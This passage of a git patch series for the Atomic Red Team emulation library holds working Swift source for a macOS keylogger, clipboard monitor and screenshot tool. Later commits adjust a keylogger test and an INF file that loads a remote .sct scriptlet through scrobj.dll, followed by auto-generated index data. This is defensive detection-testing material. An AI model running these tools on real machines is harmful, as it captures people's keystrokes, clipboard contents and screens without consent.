map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift + map[226] = ["[LALT]","[LALT]"] // left alt + map[227] = ["[LCMD]","[LCMD]"] // left cmd + map[228] = ["[RCTRL]","[RCTRL]"] // right control + map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift + map[230] = ["[RALT]","[RALT]"] // right alt + map[231] = ["[RCMD]","[RCMD]"] // right cmd + return map +} + +class SwiftSpy +{ + func ActiveApp() + { + // Hook active application + let notificationCenter = NSWorkspace.shared.notificationCenter + notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main) + { (notificationCenter: Notification) in + + let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication + print("") + print("[+] New Active App:", currentApp.localizedName!) + } + RunLoop.current.run() + } + + func ClipboardMonitor() + { + setbuf(__stdoutp, nil) + let pasteboard = NSPasteboard.general + var changeCount = NSPasteboard.general.changeCount + while true { + Thread.sleep(forTimeInterval: 1.0) + if let clipboardData = pasteboard.string(forType: .string) + { + if pasteboard.changeCount != changeCount + { + print("") + print("[+] Copy event detected at", NSDate(), "(UTC)!") + print("[+] Clipboard Data:", clipboardData) + changeCount = pasteboard.changeCount + } + } + } + } + + // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events + // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even + var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in + let elem: IOHIDElement = IOHIDValueGetElement(value); + let scancode = IOHIDElementGetUsage(elem); + + if (IOHIDElementGetUsagePage(elem) != 0x07) + { + return + } + + // invalid keys + if (scancode < 4 || scancode > 231) + { + return; + } + + // returns 1 when a key was pressed and 0 when a key is released + let pressed = IOHIDValueGetIntegerValue(value); + if (pressed == 1) + { + // modifying caplocks variable and return + if (scancode == 57) + { + capslock = !capslock + print(keyMap[scancode]![0], terminator:"") + return + } + + // print shift up and return + if (scancode == 225 || scancode == 229) + { + print(keyMap[scancode]![0], terminator:"") + return + } + + // no capslock + if (capslock == false) + { + print(keyMap[scancode]![0], terminator:"") + + } + // capslock on + else if (capslock == true) + { + // only capitalize letters + if (scancode >= 4 && scancode <= 29) + { + print(keyMap[scancode]![1], terminator:"") + } + else + { + print(keyMap[scancode]![0], terminator:"") + } + } + } + else if((pressed == 0) && (scancode == 225 || scancode == 229)) + { + print(keyMap[scancode]![1], terminator:"") + } + } + + // https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard + // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html + // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application + func Keylog() + { + // Create HID Manager + let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0) + if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID()) + { + print("[-] Could not create HID manager") + exit(1); + } + else + { + print("[+] HID manager created!") + } + + // Setup device filtering, + func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary { + let dict = [ + kIOHIDDeviceUsageKey: usage, + kIOHIDDeviceUsagePageKey: usagePage + ] as NSDictionary + + return dict.mutableCopy() as! NSMutableDictionary; + } + let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard) + IOHIDManagerSetDeviceMatching(HIDManager, keyboard) + + // Enumerate keyboard devices + let devices = IOHIDManagerCopyDevices(HIDManager) + if (devices != nil) { + print("[+] HID Devices enumerated:") + print(devices!) + } + else + { + print("[-] Could not find any devices") + exit(1); + } + + // Setup callback + let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque()) + IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context); + + // Open HID Manager + let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) ) + if ioreturn != kIOReturnSuccess + { + print("[-] Could not open HID manager") + print("\nThis is likely because the application running this does not have Input Monitoring permissions.") + print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.") + exit(1); + } + else + { + print("[+] HID manager opened!") + } + + // Start RunLoop + let calendar = Calendar.current + IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue) + RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!) + exit(0); + } + + // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231 + func Screenshot(folderName: String) + { + var displayCount: UInt32 = 0; + var result = CGGetActiveDisplayList(0, nil, &displayCount) + if (result != CGError.success) { + print("Error: \(result)") + return + } + let allocated = Int(displayCount) + let activeDisplays = UnsafeMutablePointer.allocate(capacity: allocated) + result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount) + + if (result != CGError.success) { + print("Error: \(result)") + return + } + + for i in 1...displayCount { + let unixTimestamp = Date() + let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true) + let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])! + let bitmapRep = NSBitmapImageRep(cgImage: screenShot) + let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])! + + do { + try jpegData.write(to: fileUrl, options: .atomic) + } + catch {print("Error: \(error)")} + } + } +} + +func Help() +{ + print("SwiftSpy by @slyd0g") + print("Usage:") + print("-h || -help | Print help menu") + print("-keylog | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions") + print("-clipboard | Monitors for changes to the system clipboard and logs to stdout") + print("-allkeys | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions") + print("-screenshot /tmp | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions") + print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions") +} + +var swiftSpy = SwiftSpy() + +if CommandLine.arguments.count == 1 +{ + Help() + exit(0) +} +else +{ + for argument in CommandLine.arguments + { + if (argument.contains("-h") || argument.contains("-help")) + { + Help() + exit(0) + } + else + { + if argument.contains("-keylog") + { + DispatchQueue.global(qos: .background).async { + swiftSpy.Keylog() + + } + swiftSpy.ActiveApp() + } + if argument.contains("-clipboard") + { + DispatchQueue.global(qos: .background).async { + swiftSpy.ClipboardMonitor() + + } + swiftSpy.ActiveApp() + } + if argument.contains("-allkeys") + { + DispatchQueue.global(qos: .background).async { + swiftSpy.ClipboardMonitor() + + } + DispatchQueue.global(qos: .background).async { + swiftSpy.Keylog() + + } + swiftSpy.ActiveApp() + } + if argument.contains("-screenshot") + { + var folder = CommandLine.arguments[2] + if (!folder.hasSuffix("/")) + { + folder.append("/") + } + + if CommandLine.arguments.count == 4 + { + let timer = UInt32(CommandLine.arguments[3]) + + while(true) + { + swiftSpy.Screenshot(folderName: folder) + sleep(timer!) + } + } + else + { + swiftSpy.Screenshot(folderName: folder) + } + } + } + } +} From 97049fe2fce28827b8ead1beef0773e225fa74cc Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 16 Jun 2022 10:38:03 -0500 Subject: [PATCH 07/11] Made requested changed --- atomics/T1056.001/T1056.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 122209d6..595f20bc 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -192,7 +192,7 @@ atomic_tests: echo "" executor: command: | - ./#{swift_src} -keylog + swift #{swift_src} -keylog cleanup_command: | kill `pgrep swift-frontend` name: bash From 3d7ae73566f673db828775e471401f40e0753911 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 16 Jun 2022 16:53:22 -0600 Subject: [PATCH 08/11] typo fix --- atomics/T1218.003/src/T1218.003.inf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218.003/src/T1218.003.inf b/atomics/T1218.003/src/T1218.003.inf index b41feb18..938ee84e 100644 --- a/atomics/T1218.003/src/T1218.003.inf +++ b/atomics/T1218.003/src/T1218.003.inf @@ -8,7 +8,7 @@ AdvancedINF=2.5 UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] -%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/src/T1218.003.sct +%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.003/src/T1218.003.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" From 2f47a4c4f2f0dbdcf33836adfe869e60a697a218 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Fri, 17 Jun 2022 10:05:33 -0500 Subject: [PATCH 09/11] Added Reference in yaml --- atomics/T1056.001/T1056.001.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 595f20bc..6f8fd663 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -174,7 +174,8 @@ atomic_tests: - name: MacOS Swift Keylogger description: | Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. - Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. + Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 supported_platforms: - macos input_arguments: From c006599f059dd7d689136a9b419248b946b965f7 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Tue, 21 Jun 2022 14:08:07 +0000 Subject: [PATCH 10/11] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1056.001/T1056.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 6f8fd663..2ddcf45a 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -172,6 +172,7 @@ atomic_tests: cleanup_command: | systemctl restart auditd - name: MacOS Swift Keylogger + auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 description: | Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a5d8863b..d22754e6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1066,3 +1066,4 @@ cd925593-fbb4-486d-8def-16cbdf944bf4 123520cc-e998-471b-a920-bd28e3feafa0 df1efab7-bc6d-4b88-8be9-91f55ae017aa 29e0afca-8d1d-471a-8d34-25512fc48315 +aee3a097-4c5c-4fff-bbd3-0a705867ae29 From 589c71ee128706c5f0e3df4624e9596a6b1991f9 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Tue, 21 Jun 2022 14:08:13 +0000 Subject: [PATCH 11/11] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-macos.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/macos-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/macos-index.md | 6 +- atomics/Indexes/Matrices/macos-matrix.md | 4 +- atomics/Indexes/index.yaml | 70 +++++++++++++++++++ atomics/T1056.001/T1056.001.md | 53 ++++++++++++++ 8 files changed, 136 insertions(+), 5 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 9ea0a115..d5750671 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"name":"Atomic Red Team (macOS)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["macOS"]},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View 